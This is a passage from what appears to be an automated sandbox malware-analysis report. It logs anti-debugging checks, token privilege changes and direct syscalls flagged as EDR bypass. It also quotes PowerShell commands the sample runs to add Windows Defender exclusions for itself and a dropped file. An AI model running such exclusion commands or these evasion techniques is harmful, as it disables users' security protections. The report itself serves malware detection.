                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012089B3 mov eax, dword ptr fs:[00000030h]9_2_012089B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011809AD mov eax, dword ptr fs:[00000030h]9_2_011809AD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011809AD mov eax, dword ptr fs:[00000030h]9_2_011809AD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A0 mov eax, dword ptr fs:[00000030h]9_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120E9E0 mov eax, dword ptr fs:[00000030h]9_2_0120E9E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118A9D0 mov eax, dword ptr fs:[00000030h]9_2_0118A9D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B49D0 mov eax, dword ptr fs:[00000030h]9_2_011B49D0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012169C0 mov eax, dword ptr fs:[00000030h]9_2_012169C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B29F9 mov eax, dword ptr fs:[00000030h]9_2_011B29F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B29F9 mov eax, dword ptr fs:[00000030h]9_2_011B29F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A9D3 mov eax, dword ptr fs:[00000030h]9_2_0124A9D3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122483A mov eax, dword ptr fs:[00000030h]9_2_0122483A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122483A mov eax, dword ptr fs:[00000030h]9_2_0122483A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BA830 mov eax, dword ptr fs:[00000030h]9_2_011BA830
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov ecx, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2835 mov eax, dword ptr fs:[00000030h]9_2_011A2835
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120C810 mov eax, dword ptr fs:[00000030h]9_2_0120C810
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184859 mov eax, dword ptr fs:[00000030h]9_2_01184859
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01184859 mov eax, dword ptr fs:[00000030h]9_2_01184859
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B0854 mov eax, dword ptr fs:[00000030h]9_2_011B0854
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216870 mov eax, dword ptr fs:[00000030h]9_2_01216870
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216870 mov eax, dword ptr fs:[00000030h]9_2_01216870
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120E872 mov eax, dword ptr fs:[00000030h]9_2_0120E872
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120E872 mov eax, dword ptr fs:[00000030h]9_2_0120E872
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01192840 mov ecx, dword ptr fs:[00000030h]9_2_01192840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180887 mov eax, dword ptr fs:[00000030h]9_2_01180887
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120C89D mov eax, dword ptr fs:[00000030h]9_2_0120C89D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A8E4 mov eax, dword ptr fs:[00000030h]9_2_0124A8E4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AE8C0 mov eax, dword ptr fs:[00000030h]9_2_011AE8C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC8F9 mov eax, dword ptr fs:[00000030h]9_2_011BC8F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BC8F9 mov eax, dword ptr fs:[00000030h]9_2_011BC8F9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FEB1D mov eax, dword ptr fs:[00000030h]9_2_011FEB1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01248B28 mov eax, dword ptr fs:[00000030h]9_2_01248B28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01248B28 mov eax, dword ptr fs:[00000030h]9_2_01248B28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AEB20 mov eax, dword ptr fs:[00000030h]9_2_011AEB20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AEB20 mov eax, dword ptr fs:[00000030h]9_2_011AEB20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01228B42 mov eax, dword ptr fs:[00000030h]9_2_01228B42
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216B40 mov eax, dword ptr fs:[00000030h]9_2_01216B40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01216B40 mov eax, dword ptr fs:[00000030h]9_2_01216B40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124AB40 mov eax, dword ptr fs:[00000030h]9_2_0124AB40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01234B4B mov eax, dword ptr fs:[00000030h]9_2_01234B4B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01234B4B mov eax, dword ptr fs:[00000030h]9_2_01234B4B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117CB7E mov eax, dword ptr fs:[00000030h]9_2_0117CB7E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122EB50 mov eax, dword ptr fs:[00000030h]9_2_0122EB50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01234BB0 mov eax, dword ptr fs:[00000030h]9_2_01234BB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01234BB0 mov eax, dword ptr fs:[00000030h]9_2_01234BB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190BBE mov eax, dword ptr fs:[00000030h]9_2_01190BBE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190BBE mov eax, dword ptr fs:[00000030h]9_2_01190BBE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120CBF0 mov eax, dword ptr fs:[00000030h]9_2_0120CBF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h]9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h]9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A0BCB mov eax, dword ptr fs:[00000030h]9_2_011A0BCB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h]9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h]9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180BCD mov eax, dword ptr fs:[00000030h]9_2_01180BCD
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AEBFC mov eax, dword ptr fs:[00000030h]9_2_011AEBFC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h]9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h]9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188BF0 mov eax, dword ptr fs:[00000030h]9_2_01188BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122EBD0 mov eax, dword ptr fs:[00000030h]9_2_0122EBD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BCA38 mov eax, dword ptr fs:[00000030h]9_2_011BCA38
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A4A35 mov eax, dword ptr fs:[00000030h]9_2_011A4A35
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A4A35 mov eax, dword ptr fs:[00000030h]9_2_011A4A35
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120CA11 mov eax, dword ptr fs:[00000030h]9_2_0120CA11
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AEA2E mov eax, dword ptr fs:[00000030h]9_2_011AEA2E
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BCA24 mov eax, dword ptr fs:[00000030h]9_2_011BCA24
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190A5B mov eax, dword ptr fs:[00000030h]9_2_01190A5B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190A5B mov eax, dword ptr fs:[00000030h]9_2_01190A5B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122EA60 mov eax, dword ptr fs:[00000030h]9_2_0122EA60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01186A50 mov eax, dword ptr fs:[00000030h]9_2_01186A50
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FCA72 mov eax, dword ptr fs:[00000030h]9_2_011FCA72
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FCA72 mov eax, dword ptr fs:[00000030h]9_2_011FCA72
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h]9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h]9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BCA6F mov eax, dword ptr fs:[00000030h]9_2_011BCA6F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B8A90 mov edx, dword ptr fs:[00000030h]9_2_011B8A90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA80 mov eax, dword ptr fs:[00000030h]9_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01254A80 mov eax, dword ptr fs:[00000030h]9_2_01254A80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188AA0 mov eax, dword ptr fs:[00000030h]9_2_01188AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01188AA0 mov eax, dword ptr fs:[00000030h]9_2_01188AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D6AA4 mov eax, dword ptr fs:[00000030h]9_2_011D6AA4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180AD0 mov eax, dword ptr fs:[00000030h]9_2_01180AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B4AD0 mov eax, dword ptr fs:[00000030h]9_2_011B4AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B4AD0 mov eax, dword ptr fs:[00000030h]9_2_011B4AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h]9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h]9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D6ACC mov eax, dword ptr fs:[00000030h]9_2_011D6ACC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BAAEE mov eax, dword ptr fs:[00000030h]9_2_011BAAEE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BAAEE mov eax, dword ptr fs:[00000030h]9_2_011BAAEE
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01208D20 mov eax, dword ptr fs:[00000030h]9_2_01208D20
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B4D1D mov eax, dword ptr fs:[00000030h]9_2_011B4D1D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h]9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h]9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01176D10 mov eax, dword ptr fs:[00000030h]9_2_01176D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h]9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h]9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119AD00 mov eax, dword ptr fs:[00000030h]9_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01238D10 mov eax, dword ptr fs:[00000030h]9_2_01238D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01238D10 mov eax, dword ptr fs:[00000030h]9_2_01238D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180D59 mov eax, dword ptr fs:[00000030h]9_2_01180D59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"Jump to behavior
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtCreateMutant: Direct from: 0x774635CC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtMapViewOfSection: Direct from: 0x77462D1C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtResumeThread: Direct from: 0x774636AC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtProtectVirtualMemory: Direct from: 0x77462F9C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtSetInformationProcess: Direct from: 0x77462C5C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtTerminateThread: Direct from: 0x77457B2E
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtNotifyChangeKey: Direct from: 0x77463C2C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtAllocateVirtualMemory: Direct from: 0x77462BFC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQueryInformationProcess: Direct from: 0x77462C26
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQuerySystemInformation: Direct from: 0x77462DFC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtDelayExecution: Direct from: 0x77462DDC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtAllocateVirtualMemory: Direct from: 0x77463C9C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeNtCreateFile: Direct from: 0x77462FEC
